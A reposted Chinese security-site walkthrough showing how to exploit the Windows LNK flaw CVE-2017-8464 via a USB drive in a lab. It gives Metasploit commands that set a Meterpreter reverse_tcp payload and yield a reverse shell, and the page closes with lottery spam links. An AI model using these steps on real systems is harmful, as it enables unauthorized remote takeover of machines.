安基網 首頁 安全 攻防案例 查看內容

號稱“震網三代”的遠程代碼執行漏洞,利用U盤獲取系統權限

2020-6-11 16:21| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 17年的問題,最近清理以前磁盤的文件發現這個記錄文檔,寫在這里。引言微軟在2017年6月中旬發布的補丁包中包含了一個關于LNK文件遠程代碼執行的漏洞,CVE編號為CVE-2017-8464,描述如果系統處理了惡意的.LNK文件,則可能允許遠程執行代碼,成功利用這個漏洞會獲得與本地用戶相同的用戶權限,攻擊者可以 ...

17年的問題,最近清理以前磁盤的文件發現這個記錄文檔,寫在這里。

引言

微軟在2017年6月中旬發布的補丁包中包含了一個關于LNK文件遠程代碼執行的漏洞,CVE編號為CVE-2017-8464,描述如果系統處理了惡意的.LNK文件,則可能允許遠程執行代碼,成功利用這個漏洞會獲得與本地用戶相同的用戶權限,攻擊者可以通過任意可移動驅動器(如U盤)或者遠程共享的方式傳播攻擊。我們以U盤測試,當受害者主機加載該U盤即會受到攻擊,無需受害者手動點擊訪問U盤,斷開U盤shell會話保持。

當時影響任何未安裝CVE-2017-8464補丁的Windows系統,可繞過MS10-046 & MS15-020補丁防護,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。

漏洞利用

測試環境:

攻擊機:kali 2.0(192.168.80.226)

靶機:win7 x64(192.168.80.114)

1、下載exp放在kali對應目錄(新版kali應該已經自帶了),此處以放在該測試目錄為例(kali2.0:/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali里配置監聽

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.80.226
LHOST => 192.168.80.226
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.80.226:4444
msf exploit(handler) > [*] Starting the payload handler...
back
msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.80.226
LHOST => 192.168.80.226
msf exploit(cve_2017_8464_lnk_rce) > exploit

執行成功后會在/root/.msf4/local/*目錄生成.dll和.lnk文件

2、在kali里加載U盤,復制文件到U盤根目錄

查看加載的U盤:

將kali目錄 /root/.msf4/local/* 下的 .lnk文件復制到U盤根目錄

復制完成后的U盤根目錄

3、在靶機上插入U盤,無需手動點擊訪問U盤,靶機即可受到攻擊,測試在win7靶機中插入U盤時,kali攻擊機收到反彈的shell

"

小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/i6836345283345908227/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱 北京快3开奖和值 电脑炒股看盘软件哪个最好用 湖南福彩快乐十分走势图爱乐彩 000004股票分析 黑龙江省快乐十分开奖结果 北京最新快三玩法 吉林快3赌大小预测图 股票配资门户 找恒瑞行配资 香港挂牌王中王挂牌图 山东省十一选五开奖走势图 天天彩选四开奖号码 湖比30选5开奖走势图 极速11选5是官方的么 福彩p62怎么算中了 广东南粤风采好彩一预测 快乐扑克3开奖直播